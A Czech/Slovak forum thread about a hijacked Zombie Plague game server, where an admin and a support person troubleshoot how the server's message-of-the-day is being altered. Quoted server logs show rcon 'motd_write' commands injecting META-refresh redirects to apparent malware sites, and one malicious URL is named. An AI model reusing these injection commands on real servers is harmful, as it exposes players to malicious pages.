Stránka 1 z 2
ZP + virus ?
Napsal: 22 zář 2012, 23:37
od UltIm4t3 Luk1
Server: 217.11.249.83:27143Zdravím,
nedávno som reinštaloval server na zombie plague, použitim Vašich instalacii. niektory z pluginov obsahuje ale kod ktory meni motd.txt kazde kolo na obsah tejto stranky:
http://searchedinfectious.pro/articles/news.phpAni tam neklikajte, pretoze Vám antivirsuový program vyhodí infekciu
Po nahradeni standardnych pluginov (amx zakladu) novymi, rekompilovanymi a tiez rekompilovanym deaglesmapmanazerom, to prestalo. Neviem teda presne ktory plugin to bol kazdopadne by som Vás chcel požiadat aby ste si to overili.
Ďakujem
Re: ZP + virus ?
Napsal: 23 zář 2012, 09:53
od Qefik
ZP a všechny pluginy co sem tam dával byly přímo z ofic. fóra, ale kouknem se na to.
Re: ZP + virus ?
Napsal: 21 říj 2012, 23:46
od UltIm4t3 Luk1
Tak problem je asi niekde inde ...
Kód: Vybrat vše
L 10/20/2012 - 21:33:28: Rcon: "rcon 769871625 MOJRCON motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://rdiofakeavremover.pro/ww/ractlazy.php?ntedapse=824892">" from "178.123.245.121:29416"
L 10/20/2012 - 21:31:51: Rcon: "rcon 769871625 MOJRCON motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://whiteboardshotelclubcom.pro/nine/history_greatest_real.php">" from "178.123.245.121:29416"
Re: ZP + virus ?
Napsal: 22 říj 2012, 06:47
od Qefik
zabanuj ve firewallu tu IP odkud to chodí. Případně zkontroluj verze metamodu a dprota. Je také možné že tam máš nějaký plugin, který umožňuje přístup k serveru.
Re: ZP + virus ?
Napsal: 22 říj 2012, 16:26
od UltIm4t3 Luk1
IP je viac bohuzial a aj na alliedmods tam o tom niekto pisal. Metamod a dproto je z tej Vasej instalacie, skontroloval som velkost s velkostou na inych serveroch a sedi. Pluginy su opat z Vasej instalacie a pluginy ktore som tam pridal su aj na inych serveroch, kde sa nic podobne nedeje.
Re: ZP + virus ?
Napsal: 22 říj 2012, 20:14
od Qefik
plugins.ini mi sem hoď. Zkoušel si dát jinou verzi ZP? Nebo případně postupně vypínat nedůležité pluginy? Koukni taky do itemů na ZP a zkus je.
Re: ZP + virus ?
Napsal: 24 říj 2012, 18:50
od UltIm4t3 Luk1
zp mozem skusit dat inu i ked je tam stale ta Vasa. Pluginy su v poriadku co som pozeral pluginy ktore som pridal ja som su zaklad a su takmer vsade a inde problem nie je. Mimoto problem zacal po reinstalacii, teda mozu to byt iba pluginy ktore su v instalacii alebo niekde pri tom. Kedze ak by to bol nejaky hacker, preco by menil iba motd? To nedava zmysel, teda je to nejaky iny problem no momentalne som zmenil rcon a cakam ci sa to vrati.
Re: ZP + virus ?
Napsal: 24 říj 2012, 18:57
od Qefik
Nikdo jiný s tím problém nemá, ale pořád nemám plugins.ini a dej sem i seznam itemů. Dále bych se rád koukl na debug po startu serveru a uvidím jestli se z toho dá něco vyčíst nebo ne.
Re: ZP + virus ?
Napsal: 25 říj 2012, 13:54
od UltIm4t3 Luk1
Ten server ani nebol nejak upravovany kedze kvoli tym utokom to ani nema zmysel takze je to tam v podstate standardne, ale ako chces pozri sa sam. Itemy su zakladne a teda zoznam itemov nie je treba. I ked som si v logoch vsimol opakovane utoky cez HLXBrute. Je blbost ako sa to dostalo von kedze ten Brute akurat skusa rozne slova a cisla. Moj rcon je takmer stale zhluk pismen a cislic ktore zmysel nedavaju a tento program ho teda odhlait nemohol. No asi to bol iba nejaky utok ktory im teda vysiel ... netusim. Najlepsie asi ale bude pozriet normal logy, kde sa dane utoky ukazali. No bohuzial logov je vela...
Re: ZP + virus ?
Napsal: 25 říj 2012, 14:38
od Qefik
Co koukám tak je tam hodně pluginů které tam nejsou v základní instalaci... Zkus vypnout všechny které nejsou potřeba pro samotný chod server (xredirect, country_track a jim podobné)
Dále tu stále nemám debug ze startu serveru (pokud nevíš jak zapnout, následuj
TENTO ODKAZ, mohlo by tam něco být. A příště stačí dávat výpisy ze souborů